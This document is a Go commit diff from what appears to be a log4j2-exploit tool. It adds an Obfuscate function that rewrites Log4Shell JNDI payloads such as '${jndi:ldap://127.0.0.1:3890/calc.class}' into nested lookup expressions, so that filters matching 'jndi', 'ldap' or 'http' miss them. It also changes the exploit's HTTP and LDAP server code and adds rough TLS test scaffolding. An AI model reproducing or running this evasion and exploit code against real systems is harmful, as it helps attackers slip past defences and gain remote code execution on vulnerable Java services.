add obfuscate, wait to change server side for fix repect execute in lod4j2 package.

Author: For-ACGN

autocert.go

@@ -0,0 +1,27 @@
+package log4j2
+
+import (
+	"fmt"
+
+	"golang.org/x/crypto/acme/autocert"
+)
+
+func testAutoCert() {
+
+	listener := autocert.NewListener("")
+
+	mgr := autocert.Manager{}
+	mgr.TLSConfig()
+
+	conn, err := listener.Accept()
+	fmt.Println(err)
+
+	buf := make([]byte, 4096)
+	n, err := conn.Read(buf)
+	fmt.Println("asdasdads", err)
+	fmt.Println(string(buf[:n]))
+
+	fmt.Println(conn.RemoteAddr())
+
+	// m:= autocert.Manager{}
+}

autocert_test.go

@@ -0,0 +1 @@
+package log4j2

log4j2.go

@@ -5,7 +5,6 @@ import (
 	"fmt"
 	"io"
 	"log"
-	"math/rand"
 	"net"
 	"net/http"
 	"sync"
@@ -63,7 +62,7 @@ func New(cfg *Config) (*Log4j2, error) {
 	}
 
 	// for generate random http handler
-	secret := generateSecret()
+	secret := randString(8)
 
 	// initialize http server
 	httpListener, err := net.Listen(cfg.HTTPNetwork, cfg.HTTPAddress)
@@ -163,7 +162,7 @@ func (log4j2 *Log4j2) Start() error {
 	select {
 	case err := <-errCh:
 		return err
-	case <-time.After(time.Second):
+	case <-time.After(250 * time.Millisecond):
 	}
 	log4j2.logger.Println("[info]", "start http server", log4j2.httpListener.Addr())
 	log4j2.logger.Println("[info]", "start ldap server", log4j2.ldapListener.Addr())
@@ -191,21 +190,3 @@ func (log4j2 *Log4j2) Stop() error {
 	log4j2.logger.Println("[info]", "log4j2-exploit server is stopped")
 	return nil
 }
-
-func generateSecret() string {
-	r := rand.New(rand.NewSource(time.Now().UnixNano()))
-	str := make([]rune, 8)
-	for i := 0; i < 8; i++ {
-		s := ' ' + 1 + r.Intn(90)
-		switch {
-		case s >= '0' && s <= '9':
-		case s >= 'A' && s <= 'Z':
-		case s >= 'a' && s <= 'z':
-		default:
-			i--
-			continue
-		}
-		str[i] = rune(s)
-	}
-	return string(str)
-}

obfuscate.go

@@ -0,0 +1,84 @@
+package log4j2
+
+import (
+	"math/rand"
+	"strings"
+)
+
+// TODO output generated string
+
+// raw: ${jndi:ldap://127.0.0.1:3890/calc.class}
+//
+// obfuscate rule:
+// 1. ${xxx-xxx:any-code:-bc} => bc
+
+// Obfuscate is used to obfuscate malicious(payload) string like
+// ${jndi:ldap://127.0.0.1:3890/calc.class} for log4j2 package.
+func Obfuscate(raw string) string {
+	l := len(raw)
+	if l < 3 {
+		return ""
+	}
+	obfuscated := strings.Builder{}
+	obfuscated.WriteString("${")
+
+	remaining := len(raw) - len("${}")
+	idx := 2
+	// prevent not obfuscate twice, otherwise maybe
+	// generate string like 1."jn" 2."di" -> "jndi"
+	lastObfuscated := true
+
+	for {
+		// first select section length
+
+		// use 0-3 is used to prevent include special
+		// string like "jndi", "ldap" and "http"
+		sl := rand.Intn(4)
+		if sl > remaining {
+			sl = remaining
+		}
+		section := raw[idx : idx+sl]
+
+		if !randBool() && lastObfuscated {
+			// not obfuscate
+			obfuscated.WriteString(section)
+
+			remaining -= sl
+			if remaining <= 0 {
+				break
+			}
+			idx += sl
+			lastObfuscated = false
+			continue
+		}
+
+		// generate useless data before section
+		obfuscated.WriteString("${")
+		n := 1 + rand.Intn(3) // 1-3
+		for i := 0; i < n; i++ {
+			front := randString(2 + rand.Intn(5))
+			end := randString(2 + rand.Intn(5))
+
+			obfuscated.WriteString(front)
+			if randBool() {
+				obfuscated.WriteString(":")
+			} else {
+				obfuscated.WriteString("-")
+			}
+			obfuscated.WriteString(end)
+		}
+		obfuscated.WriteString(":-")
+		obfuscated.WriteString(section)
+		obfuscated.WriteString("}")
+
+		remaining -= sl
+		if remaining <= 0 {
+			break
+		}
+		idx += sl
+		lastObfuscated = true
+	}
+
+	obfuscated.WriteString("}")
+	return obfuscated.String()
+}

obfuscate_test.go

@@ -0,0 +1,69 @@
+package log4j2
+
+import (
+	"crypto/tls"
+	"fmt"
+	"net/http"
+	"testing"
+
+	"github.com/stretchr/testify/require"
+	"golang.org/x/crypto/acme/autocert"
+)
+
+func TestObfuscate(t *testing.T) {
+	obfuscated := Obfuscate("${jndi:ldap://127.0.0.1:3890/calc.class}")
+	fmt.Println(obfuscated)
+}
+
+func TestNewListener(t *testing.T) {
+	const testDomain = "test"
+
+	mux := http.NewServeMux()
+	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
+		fmt.Fprintf(w, "Hello, TLS user! Your config: %+v", r.TLS)
+	})
+	server := http.Server{}
+	server.Handler = mux
+	go func() {
+
+		http.DefaultClient.Transport = &http.Transport{}
+
+		listener := autocert.NewListener(testDomain)
+		conn, err := listener.Accept()
+		require.NoError(t, err)
+
+		buf := make([]byte, 4096)
+		n, err := conn.Read(buf)
+		fmt.Println("asdasdads", err)
+		fmt.Println(string(buf[:n]))
+
+		fmt.Println(conn.RemoteAddr())
+
+		// log.Fatal(server.Serve(autocert.NewListener("example.com")))
+	}()
+
+	cfg := tls.Config{
+		ServerName: testDomain,
+	}
+
+	client := http.Client{
+		Transport: &http.Transport{
+			TLSClientConfig: &cfg,
+		},
+	}
+
+	req, err := http.NewRequest(http.MethodGet, "https://127.0.0.1:443/", nil)
+	require.NoError(t, err)
+	req.Host = testDomain
+
+	resp, err := client.Do(req)
+	require.NoError(t, err)
+
+	fmt.Println(resp.StatusCode)
+
+	// conn, err := tls.Dial("tcp", "127.0.0.1:443", &cfg)
+	// require.NoError(t, err)
+	//
+	// _, err = conn.Write([]byte{1, 2, 3, 4})
+	// require.NoError(t, err)
+}

rand.go

@@ -0,0 +1,31 @@
+package log4j2
+
+import (
+	"math/rand"
+	"time"
+)
+
+func init() {
+	rand.Seed(time.Now().UnixNano())
+}
+
+func randBool() bool {
+	return rand.Int63()%2 == 0
+}
+
+func randString(n int) string {
+	str := make([]rune, n)
+	for i := 0; i < n; i++ {
+		s := ' ' + 1 + rand.Intn(90)
+		switch {
+		case s >= '0' && s <= '9':
+		case s >= 'A' && s <= 'Z':
+		case s >= 'a' && s <= 'z':
+		default:
+			i--
+			continue
+		}
+		str[i] = rune(s)
+	}
+	return string(str)
+}

rand_test.go

@@ -0,0 +1 @@
+package log4j2